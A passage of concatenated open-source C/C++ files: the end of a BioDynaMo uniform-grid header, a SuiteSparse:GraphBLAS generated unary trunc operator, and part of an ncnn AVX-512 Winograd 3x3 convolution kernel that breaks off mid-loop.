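// Moore neighborhood processes each adjacent box pair exactly once, which is
// what makes this variant useful for symmetric pairwise interactions:
//   FixedSizeVector<size_t, 14> half_moore;
//   GetHalfMooreBoxIndices(&half_moore, box_idx);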
/// @brief Gets the pointer to the box with the given index
///
/// @param[in] index The index of the box
///
/// @return The pointer to the box
///
const Box* GetBoxPointer(size_t index) const { return &(boxes_[index]); }
/// @brief Gets the pointer to the box with the given index
///
/// @param[in] index The index of the box
///
/// @return The pointer to the box
///
Box* GetBoxPointer(size_t index) { return &(boxes_[index]); }
/// Returns the box index in the one dimensional array based on box
/// coordinates in space
///
/// @param box_coord box coordinates in space (x, y, z)
///
/// @return The box index.
///
size_t GetBoxIndex(const std::array<uint64_t, 3>& box_coord) const {
return box_coord[2] * num_boxes_xy_ + box_coord[1] * num_boxes_axis_[0] +
box_coord[0];
}
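// Example (illustrative, assuming num_boxes_xy_ == num_boxes_axis_[0] *
// num_boxes_axis_[1]): with num_boxes_axis_ = {4, 5, 6}, num_boxes_xy_ = 20
// and box_coord (1, 2, 3) maps to 3 * 20 + 2 * 4 + 1 = 69, i.e. a z-major
// layout, then y, then x.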
};
} // namespace bdm
#endif // CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
|
GB_unop__trunc_fp64_fp64.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB (_unop_apply__trunc_fp64_fp64)
// op(A') function: GB (_unop_tran__trunc_fp64_fp64)
// C type: double
// A type: double
// cast: double cij = aij
// unaryop: cij = trunc (aij)
#define GB_ATYPE \
double
#define GB_CTYPE \
double
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
double aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = trunc (x) ;
// casting
#define GB_CAST(z, aij) \
double z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
double aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
double z = aij ; \
Cx [pC] = trunc (z) ; \
}
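// For example, GB_CAST_OP (p,p) expands to
// { double aij = Ax [p] ; double z = aij ; Cx [p] = trunc (z) ; }
// which matches the loop bodies in GB (_unop_apply__trunc_fp64_fp64) below.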
// true if operator is the identity op with no typecasting
#define GB_OP_IS_IDENTITY_WITH_NO_TYPECAST \
0
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_TRUNC || GxB_NO_FP64)
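// (When either flag is set via GB_control.h, both functions in this file
// return GrB_NO_VALUE and the caller falls back to the generic,
// non-specialized kernel.)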
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_apply__trunc_fp64_fp64)
(
double *Cx, // Cx and Ax may be aliased
const double *Ax,
const int8_t *restrict Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
// TODO: if OP is ONE and uniform-valued matrices are exploited, then
// do this in O(1) time
if (Ab == NULL)
{
#if ( GB_OP_IS_IDENTITY_WITH_NO_TYPECAST )
GB_memcpy (Cx, Ax, anz * sizeof (double), nthreads) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
double aij = Ax [p] ;
double z = aij ;
Cx [p] = trunc (z) ;
}
#endif
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
double aij = Ax [p] ;
double z = aij ;
Cx [p] = trunc (z) ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_tran__trunc_fp64_fp64)
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
convolution_3x3_pack16.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void conv3x3s1_winograd63_transform_kernel_pack16_avx512(const Mat& kernel, Mat& kernel_tm_pack8, int inch, int outch, const Option& opt)
{
// winograd63 transform kernel
Mat kernel_tm;
kernel_tm.create(8 * 8, inch, outch);
const float ktm[8][3] = {
{1.0f, 0.0f, 0.0f},
{-2.0f / 9, -2.0f / 9, -2.0f / 9},
{-2.0f / 9, 2.0f / 9, -2.0f / 9},
{1.0f / 90, 1.0f / 45, 2.0f / 45},
{1.0f / 90, -1.0f / 45, 2.0f / 45},
{1.0f / 45, 1.0f / 90, 1.0f / 180},
{1.0f / 45, -1.0f / 90, 1.0f / 180},
{0.0f, 0.0f, 1.0f}
};
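// ktm is the kernel-transform matrix G (8x3) of Winograd F(6x6, 3x3): each
// 3x3 kernel g is lifted into the 8x8 transform domain as U = G * g * G^T,
// computed below as a row pass ("h") followed by a column pass ("v").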
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
for (int q = 0; q < inch; q++)
{
const float* kernel0 = (const float*)kernel + p * inch * 9 + q * 9;
float* kernel_tm0 = kernel_tm.channel(p).row(q);
// transform kernel, transposed
const float* k0 = kernel0;
const float* k1 = kernel0 + 3;
const float* k2 = kernel0 + 6;
// h
float tmp[8][3];
for (int i = 0; i < 8; i++)
{
tmp[i][0] = k0[0] * ktm[i][0] + k0[1] * ktm[i][1] + k0[2] * ktm[i][2];
tmp[i][1] = k1[0] * ktm[i][0] + k1[1] * ktm[i][1] + k1[2] * ktm[i][2];
tmp[i][2] = k2[0] * ktm[i][0] + k2[1] * ktm[i][1] + k2[2] * ktm[i][2];
}
// v
for (int j = 0; j < 8; j++)
{
float* tmpp = &tmp[j][0];
for (int i = 0; i < 8; i++)
{
kernel_tm0[j * 8 + i] = tmpp[0] * ktm[i][0] + tmpp[1] * ktm[i][1] + tmpp[2] * ktm[i][2];
}
}
}
}
// interleave
// src = 64-inch-outch
// dst = 16b-16a-inch/16a-64-outch/16b
kernel_tm_pack8.create(inch / 16, 64, outch / 16, (size_t)4u * 16 * 16, 16 * 16);
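// (inch and outch are presumably multiples of 16 here, as implied by the
// pack16 layout and the "q + 15 < outch" / "p + 15 < inch" loop bounds below.)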
int q = 0;
for (; q + 15 < outch; q += 16)
{
Mat g0 = kernel_tm_pack8.channel(q / 16);
for (int k = 0; k < 64; k++)
{
float* g00 = g0.row(k);
for (int p = 0; p + 15 < inch; p += 16)
{
for (int i = 0; i < 16; i++)
{
for (int j = 0; j < 16; j++)
{
const float* k00 = kernel_tm.channel(q + j).row(p + i);
g00[0] = k00[k];
g00++;
}
}
}
}
}
}
static void conv3x3s1_winograd63_pack16_avx512(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel_tm, const Mat& bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
// pad to 6n+2
Mat bottom_blob_bordered = bottom_blob;
outw = (outw + 5) / 6 * 6;
outh = (outh + 5) / 6 * 6;
w = outw + 2;
h = outh + 2;
copy_make_border(bottom_blob, bottom_blob_bordered, 0, h - bottom_blob.h, 0, w - bottom_blob.w, BORDER_CONSTANT, 0.f, opt);
// BEGIN transform input
Mat bottom_blob_tm;
{
int w_tiles = outw / 6;
int h_tiles = outh / 6;
const int tiles = w_tiles * h_tiles;
bottom_blob_tm.create(tiles, 64, inch, elemsize, elempack, opt.workspace_allocator);
conv3x3s1_winograd63_transform_input_pack16_avx512(bottom_blob_bordered, bottom_blob_tm, opt);
}
bottom_blob_bordered = Mat();
// END transform input
// BEGIN dot
Mat top_blob_tm;
{
int w_tm = outw / 6 * 8;
int h_tm = outh / 6 * 8;
const int tiles = h_tm / 8 * w_tm / 8;
Mat bottom_blob_tm2;
if (tiles >= 12)
bottom_blob_tm2.create(12 * inch, tiles / 12 + (tiles % 12) / 8 + (tiles % 12 % 8) / 4 + (tiles % 12 % 4) / 2 + tiles % 12 % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 8)
bottom_blob_tm2.create(8 * inch, tiles / 8 + (tiles % 8) / 4 + (tiles % 4) / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 4)
bottom_blob_tm2.create(4 * inch, tiles / 4 + (tiles % 4) / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 2)
bottom_blob_tm2.create(2 * inch, tiles / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else // if (tiles >= 1)
bottom_blob_tm2.create(1 * inch, tiles, 64, elemsize, elempack, opt.workspace_allocator);
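// Packing example (illustrative): for tiles = 23 the rows of bottom_blob_tm2
// hold groups of 12, 8, 2 and 1 tiles (23 = 12 + 8 + 2 + 1); the row holding
// tile i is recovered below as
// i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2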
#pragma omp parallel for num_threads(opt.num_threads)
for (int r = 0; r < 64; r++)
{
Mat tm2 = bottom_blob_tm2.channel(r);
// tile
int i = 0;
for (; i + 11 < tiles; i += 12)
{
float* tmpptr = tm2.row(i / 12);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x12
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _r8 = _mm512_load_ps(r0 + 16 * 8);
__m512 _r9 = _mm512_load_ps(r0 + 16 * 9);
__m512 _ra = _mm512_load_ps(r0 + 16 * 10);
__m512 _rb = _mm512_load_ps(r0 + 16 * 11);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_unpacklo_ps(_r8, _r9);
__m512 _tmp9 = _mm512_unpackhi_ps(_r8, _r9);
__m512 _tmpa = _mm512_unpacklo_ps(_ra, _rb);
__m512 _tmpb = _mm512_unpackhi_ps(_ra, _rb);
__m512 _tmpc = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpg = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmph = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpi = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpj = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpk = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpl = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpm = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpn = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp5 = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(2, 0, 2, 0));
_tmp6 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp8 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(3, 1, 3, 1));
_tmp9 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(3, 1, 3, 1));
_tmpa = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_tmpb = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(2, 0, 2, 0));
_r5 = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(2, 0, 2, 0));
_r6 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r8 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r9 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_ra = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(3, 1, 3, 1));
_rb = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
_mm512_store_ps(tmpptr + 16 * 8, _r8);
_mm512_store_ps(tmpptr + 16 * 9, _r9);
_mm512_store_ps(tmpptr + 16 * 10, _ra);
_mm512_store_ps(tmpptr + 16 * 11, _rb);
tmpptr += 192;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 7 < tiles; i += 8)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x8
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp9 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpa = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpb = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpc = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(3, 1, 3, 1));
_tmp5 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp6 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r5 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r6 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
tmpptr += 128;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 3 < tiles; i += 4)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x4
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp5 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmp6 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp7 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_tmp3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r3 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
tmpptr += 64;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 1 < tiles; i += 2)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x2
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
__m512 _tmp3 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
tmpptr += 32;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i < tiles; i++)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
__m512 _val = _mm512_load_ps(r0);
_mm512_store_ps(tmpptr, _val);
tmpptr += 16;
r0 += bottom_blob_tm.cstep * 16;
}
}
}
bottom_blob_tm = Mat();
// permute end
top_blob_tm.create(tiles, 64, outch, elemsize, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* output0_tm = top_blob_tm.channel(p);
const Mat kernel0_tm = kernel_tm.channel(p);
for (int r = 0; r < 64; r++)
{
const Mat bb2 = bottom_blob_tm2.channel(r);
int i = 0;
for (; i + 11 < tiles; i += 12)
{
const float* r0 = bb2.row(i / 12);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
__m512 _sum8 = _mm512_setzero_ps();
__m512 _sum9 = _mm512_setzero_ps();
__m512 _suma = _mm512_setzero_ps();
__m512 _sumb = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
__m512 _val8 = _mm512_set1_ps(r0[8]);
__m512 _val9 = _mm512_set1_ps(r0[9]);
_sum8 = _mm512_fmadd_ps(_val8, _w0, _sum8);
_sum9 = _mm512_fmadd_ps(_val9, _w0, _sum9);
__m512 _vala = _mm512_set1_ps(r0[10]);
__m512 _valb = _mm512_set1_ps(r0[11]);
_suma = _mm512_fmadd_ps(_vala, _w0, _suma);
_sumb = _mm512_fmadd_ps(_valb, _w0, _sumb);
r0 += 12;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
_mm512_store_ps(output0_tm + 16 * 8, _sum8);
_mm512_store_ps(output0_tm + 16 * 9, _sum9);
_mm512_store_ps(output0_tm + 16 * 10, _suma);
_mm512_store_ps(output0_tm + 16 * 11, _sumb);
output0_tm += 16 * 12;
}
for (; i + 7 < tiles; i += 8)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
